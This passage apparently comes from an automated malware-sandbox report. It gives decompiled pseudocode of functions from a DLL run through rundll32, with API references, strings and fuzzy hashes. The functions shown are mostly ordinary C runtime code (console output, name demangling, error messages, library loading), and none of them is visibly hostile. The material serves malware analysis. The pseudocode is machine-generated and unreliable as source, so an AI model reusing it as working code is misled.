							_t72 = ( *_t270 & 0x000000ff) + 0x1004d7f0; // 0x0
							_t254 =  *_t72 + 1;
							_v48 = _t254;
							__eflags = _t254 - _t265;
							if(_t254 > _t265) {
								__eflags = _t265;
								if(_t265 <= 0) {
									goto L40;
								} else {
									_t279 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t279 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t270));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t254 - 4;
								_v140 = _t241;
								_v56 = _t270;
								_v40 = (_t254 == 4) + 1;
								_t220 = E1003356D( &_v144,  &_v76,  &_v56, (_t254 == 4) + 1,  &_v144);
								_t288 = _t287 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t280 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t249 + _v48 + 0x2e) & 0x000000ff) + 0x1004d7f0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t265) {
								__eflags = _t265;
								if(_t265 > 0) {
									_t281 = _t249;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t270));
										_t260 =  *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t281 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t260 + _v40 + 0x2e)) = _t227;
										_t281 = _v44;
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									L39:
									_t274 = _v88;
								}
								L40:
								_t278 = _t274 + _t265;
								__eflags = _t278;
								L41:
								__eflags = _v60;
								_v88 = _t278;
							} else {
								_t265 = _v40;
								_t283 = _t241;
								_t261 = _v116;
								do {
									 *((char*)(_t286 + _t283 - 0xc)) =  *((intOrPtr*)(_t261 + _t283));
									_t283 =  &(_t283->Internal);
								} while (_t283 < _t265);
								_t284 = _v48;
								_t262 = _v44;
								if(_v48 > 0) {
									E100045C0( &_v16 + _t265, _t270, _t284);
									_t262 = _v44;
									_t287 = _t287 + 0xc;
									_t265 = _v40;
								}
								_t273 = _v80;
								_t285 = _t241;
								do {
									 *( *((intOrPtr*)(0x1004e628 + _t273 * 4)) + _t262 + _t285 + 0x2e) = _t241;
									_t285 =  &(_t285->Internal);
								} while (_t285 < _t265);
								_t270 = _v104;
								_t280 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E1003356D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t288 = _t287 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t270 = _t270 - 1 + _t280;
									L27:
									_t270 =  &(_t270[1]);
									_v104 = _t270;
									_t193 = E10028BDD(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t287 = _t288 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t274 = _v84 - _v108 + _t270;
											_v88 = _t274;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t270 >= _v96) {
														goto L48;
													} else {
														_t246 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t274 = _t274 + 1;
															_v88 = _t274;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t265 =  *((intOrPtr*)(_t249 + _t186 + 0x2d));
						__eflags = _t265 & 0x00000004;
						if((_t265 & 0x00000004) == 0) {
							_v33 =  *_t270;
							_t188 = E10024262(_t265);
							_t250 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t250 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t250 * 2)) >= _t241) {
								_push(1);
								_push(_t270);
								goto L26;
							} else {
								_t100 =  &(_t270[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t265 = _v80;
									_t252 = _v44;
									 *((char*)(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2e)) = _v33;
									 *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) =  *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) | 0x00000004;
									_t278 = _t274 + 1;
									goto L41;
								} else {
									_t206 = E1002C39D( &_v76, _t270, 2);
									_t288 = _t287 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t270 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t265 = _t265 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t249 + _t186 + 0x2e));
							_v23 =  *_t270;
							_push(2);
							 *(_t249 + _v48 + 0x2d) = _t265;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E1002C39D();
							_t288 = _t287 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t286;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E100037EA(_a4, _v8 ^ _t286, _t265);
			}

APIs

GetConsoleOutputCP.KERNEL32 ref: 100326A5
__fassign.LIBCMT ref: 1003288A
__fassign.LIBCMT ref: 100328A7
WriteFile.KERNEL32(?,1002B316,00000000,?,00000000), ref: 100328EF
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1003292F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 100329D7

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction ID: a8bb8432d5e3edc8eb75f8d90f54bae1a245339a155dc0d31e03c7975ac7510e
Opcode Fuzzy Hash: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction Fuzzy Hash: 91C1AC75D052988FDB12CFA8C980AEDBBF5EF09314F29416AE855FB341D631AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CDCE, Relevance: 9.1, APIs: 6, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CDCE(intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				char* _t29;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					_t29 =  *0x1004e004; // 0x0
					if( *_t29 == 0) {
						E100076A6(E100072DE( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E10009A99( &_v12);
						_t65 = E100076A6(E100076C8( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x1004e004; // 0x0
							if( *_t39 == 0x40) {
								L19:
								 *0x1004e004 = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E10007748(_t75,  &_v12);
									_t67 =  *((intOrPtr*)(_t75 + 4));
									_t39 =  *0x1004e004; // 0x0
									while(_t67 <= 1) {
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E100078B0(_t75, 1);
											}
											E100077F7(_t75, 0x7d);
											_t39 =  *0x1004e004; // 0x0
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = E10007637(_t67,  &_v20, 0x60, E1000B7FB(_t73,  &_v28));
												_t78 = _t78 + 0x10;
												E100077A0(_t75, E100076C8(_t48,  &_v36, 0x27));
												_t39 =  *0x1004e004; // 0x0
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x1004e004 = _t39;
												}
												_t67 =  *((intOrPtr*)(_t75 + 4));
												if(_t67 <= 1) {
													if( *_t39 == 0x40) {
														continue;
													} else {
														_v12 = "s ";
														_v8 = 2;
														goto L5;
													}
													goto L21;
												}
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}

APIs

DName::operator+.LIBCMT ref: 1000CE12
DName::operator+.LIBCMT ref: 1000CE1E

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+=.LIBCMT ref: 1000CEDE

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 1000CE99

Part of subcall function 100077A0: DName::operator=.LIBVCRUNTIME ref: 100077C1

DName::DName.LIBVCRUNTIME ref: 1000CF02
DName::operator+.LIBCMT ref: 1000CF0E

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction ID: 2463ad79b5e98d84085c04d8798126b1c143ff2480c819560cb4cfdd011bf85e
Opcode Fuzzy Hash: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction Fuzzy Hash: BD41E6B4A04388AFFB10CFA8C995FAE7BEAEB05380F400058F58AE7295D7356D40C759

Uniqueness

Uniqueness Score: -1.00%

Function 1000BBAD, Relevance: 9.1, APIs: 6, Instructions: 95
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000BBAD(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				char _t39;
				intOrPtr _t40;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr* _t60;

				_t60 = _a4;
				 *_t60 = 0;
				 *((intOrPtr*)(_t60 + 4)) = 0;
				_t25 = E1000CF24(__edx,  &_v12, 1, 0);
				_t40 =  *_t25;
				 *_t60 = _t40;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t60 + 4)) = _t26;
				_t27 =  *0x1004e004; // 0x0
				_t39 = 2;
				if(_t26 != 0) {
					L4:
					_t57 =  *_t27;
					if(_t57 != 0x40) {
						if(_t57 == 0) {
							_push(1);
							if(_t40 != 0) {
								_v12 = "::";
								_v8 = _t39;
								_t30 = E100076A6(E10007684(E100072DE( &_v36),  &_v28,  &_v12),  &_v20, _t60);
								 *_t60 =  *_t30;
								 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t30 + 4));
							} else {
								E10007596(_t60);
							}
						} else {
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *((char*)(_t60 + 4)) = _t39;
							 *_t60 = 0;
						}
						L11:
						return _t60;
					}
					L5:
					 *0x1004e004 = _t27 + 1;
					goto L11;
				}
				_t58 =  *_t27;
				if(_t58 == 0) {
					goto L4;
				}
				if(_t58 == 0x40) {
					goto L5;
				} else {
					_v12 = "::";
					_v8 = _t39;
					_t37 = E100076A6(E10007684(E1000B7FB(_t58,  &_v20),  &_v28,  &_v12),  &_v36, _t60);
					_t40 =  *_t37;
					 *_t60 = _t40;
					 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t37 + 4));
					_t27 =  *0x1004e004; // 0x0
					goto L4;
				}
			}

APIs

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

DName::operator=.LIBVCRUNTIME ref: 1000BC53

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

DName::operator+.LIBCMT ref: 1000BC0E
DName::operator+.LIBCMT ref: 1000BC1A
DName::DName.LIBVCRUNTIME ref: 1000BC67
DName::operator+.LIBCMT ref: 1000BC76
DName::operator+.LIBCMT ref: 1000BC82

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction ID: 27af3a92f5b1fd040e2588c0fddfed7d18473ac67e6e21bd44ed062d0c5557d9
Opcode Fuzzy Hash: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction Fuzzy Hash: C031DCB5A00605AFEB18CF98D991DEEBBF9EF59380F00445DE58BA7341DB35AA44CB04

Uniqueness

Uniqueness Score: -1.00%

Function 10005A4B, Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10005A4B(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x1004d060 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E1000D892(_t13, __eflags,  *0x1004d060);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E1000D8CD(_t14, __eflags,  *0x1004d060, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E10012164();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E1000D8CD(_t18, __eflags,  *0x1004d060, 0);
								} else {
									_t8 = E1000D8CD(_t18, __eflags,  *0x1004d060, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E10011FAC(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,1000526E,10003561,10003963,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D), ref: 10005A59
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10005A67
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005A80
SetLastError.KERNEL32(00000000,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D,?,00000001,?), ref: 10005AD2

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction ID: 7db28cdefa02e9f84fa3800d6371fd0a77151277f221630a79e8ae18b089995f
Opcode Fuzzy Hash: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction Fuzzy Hash: 53012436349322AEF714F7B06CC5A1B3B84EB036F2B20033BF510860E9EF229C119665

Uniqueness

Uniqueness Score: -1.00%

Function 10038FA4, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10038FA4(void* __ebx, signed short* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				signed int _v8;
				signed int _v12;
				char _v13;
				void _v512;
				long _v516;
				void* __edi;
				signed int _t17;
				signed int _t26;
				char* _t31;
				signed short* _t34;
				void* _t35;
				void* _t36;
				signed int _t39;
				signed int _t42;

				_t35 = __esi;
				_t34 = __edx;
				_t39 = _t42;
				if(E1003B6E1(3) == 1 || __eax == 0 &&  *0x1004e888 == 1) {
					_pop(_t39);
					_push(_t39);
					_t40 = _t42;
					_t17 =  *0x1004d054; // 0x940b3682
					_v8 = _t17 ^ _t42;
					_push(_t35);
					_t36 = GetStdHandle(0xfffffff4);
					if(_t36 != 0 && _t36 != 0xffffffff) {
						_t34 = _v0;
						_t31 =  &_v512;
						while(1) {
							 *_t31 =  *_t34;
							_t31 = _t31 + 1;
							if(_t31 ==  &_v12) {
								break;
							}
							_t26 =  *_t34 & 0x0000ffff;
							_t34 =  &(_t34[1]);
							if(_t26 != 0) {
								continue;
							}
							break;
						}
						_v13 = 0;
						_v516 = 0;
						_t19 = WriteFile(_t36,  &_v512, _t31 -  &_v512 - 1,  &_v516, 0);
					}
					return E100037EA(_t19, _v12 ^ _t40, _t34);
				} else {
					_push(__esi);
					__eax = E10028A30(0x1004e890, 0x314, L"Runtime Error!\n\nProgram: ");
					__ebx = 0;
					if(__eax != 0) {
						L21:
						__eax = E1000E341();
						asm("int3");
						__eax =  *0x1004e888; // 0x0
						return __eax;
					} else {
						_push(__edi);
						__esi = 0x1004e8c2;
						 *0x1004eaca = __ax;
						__eax = GetModuleFileNameW(0, 0x1004e8c2, 0x104);
						__edi = 0x2fb;
						if(__eax != 0 || E10028A30(0x1004e8c2, 0x2fb, L"<program name unknown>") == 0) {
							_t10 = __esi + 2; // 0x1004e8c4
							__ecx = _t10;
							do {
								__ax =  *__esi;
								__esi = __esi + 2;
							} while (__ax != __bx);
							__esi = __esi - __ecx;
							__esi = __esi >> 1;
							_t11 = __esi + 1; // 0x1004e8c1
							__eax = _t11;
							if(_t11 <= 0x3c) {
								L17:
								__edi = 0x314;
								__esi = 0x1004e890;
								if(E1002F999(0x1004e890, 0x314, L"\n\n") != 0) {
									goto L21;
								} else {
									__eax = E1002F999(0x1004e890, 0x314, _a4);
									_pop(__edi);
									if(__eax != 0) {
										goto L21;
									} else {
										_push(L"Microsoft Visual C++ Runtime Library");
										__eax = E1003B8C9(__ecx, 0x1004e890);
										_pop(__esi);
										__ebx = 0x12010;
										_pop(__ebp);
										return __eax;
									}
								}
							} else {
								_push(3);
								_t12 = __esi - 0x3b; // 0x1004e885
								__eax = _t12;
								__edi = __edi - __eax;
								__eax =  &(0x1004e8c2[__eax]);
								if(__eax != 0) {
									goto L21;
								} else {
									goto L17;
								}
							}
						} else {
							goto L21;
						}
					}
				}
			}

APIs

GetModuleFileNameW.KERNEL32(00000000,1004E8C2,00000104), ref: 10039001

Strings

..., xrefs: 1003904F
Microsoft Visual C++ Runtime Library, xrefs: 10039096
Runtime Error!Program: , xrefs: 10038FCD
<program name unknown>, xrefs: 10039010

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction ID: afe29cdb41c4ee65c3bb8b902ab9bfe68787d4c676a15ac55f3717a69dda071b
Opcode Fuzzy Hash: 978fa5827ac3f20c3a5892375d5cf1e429f3470c3e46e072c65876f1f59388a5
Instruction Fuzzy Hash: E0216B76E003863EE326D2209C85E9B278CCF823C6F510439FD08DA142FB62DE05C1E9

Uniqueness

Uniqueness Score: -1.00%

Function 10027AD5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10027AD5(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E10028BDD(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E10028BDD(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E10024468(GetLastError());
									_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E10027C17(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E10024468(GetLastError());
						_t17 =  *((intOrPtr*)(E1002449E(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E10027C17(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E10027C59(_a8);
				return 0;
			}

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 10027ADA

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction ID: 57770cad2dc7d873b8782db2f193e3cd771f19afa728aead8fe90cc5b1cf633c
Opcode Fuzzy Hash: bbc049e0065af9d9264ab7fce4791e26f57c73b9850f6306894c5905cdc9b224
Instruction Fuzzy Hash: 06219F7560021ABFE721DF61AC81E5B77ACFF412A47A24924FA2C97151DB31FC408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000144D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000144D(void* __ecx, void* __edx, struct HWND__* _a4, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				void* _t23;

				_t23 = __edx;
				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0) {
					RedrawWindow(_a4, 0, 0, 0x105);
					E10001CFA(0x1004dc38);
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t23,  *0x1004dc38);
					 *0x1004dc34 = 1;
				}
				return 0;
			}

0x1000144d
0x10001476
0x10001482
0x1000148f
0x10001499
0x1000149f
0x100014a5
0x100014ac
0x100014b1
0x100014b1
0x100014bc

APIs

GetMenu.USER32 ref: 10001456
GetSubMenu.USER32 ref: 1000145F
GetMenuState.USER32(00000000,000000CB,00000000), ref: 1000146E
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 10001482

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

Strings

<1, xrefs: 10001488, 100014A6

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateRedrawStateWindow
String ID: <1
API String ID: 2380408669-3323784537
Opcode ID: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction ID: be1ad7771bc6ae16dbc7eccf9958df4cdf15cb777987d046380b36b05f21978e
Opcode Fuzzy Hash: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction Fuzzy Hash: D2F03C74601229BBEB11AF64CE8DECB3EA9EF06790F404055F905E6160DAB09941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10029E10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029E10(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E10023828(_a4, L"api-ms-", 7) == 0 || E10023828(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x10029e1f
0x10029e27
0x10029e72
0x10029e29
0x10029e32
0x00000000
0x10029e6f
0x10029e6e
0x10029e6e

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,10029DC9), ref: 10029E1F
GetLastError.KERNEL32(?,10029DC9), ref: 10029E29
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 10029E67

Strings

api-ms-, xrefs: 10029E36
ext-ms-, xrefs: 10029E4C

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

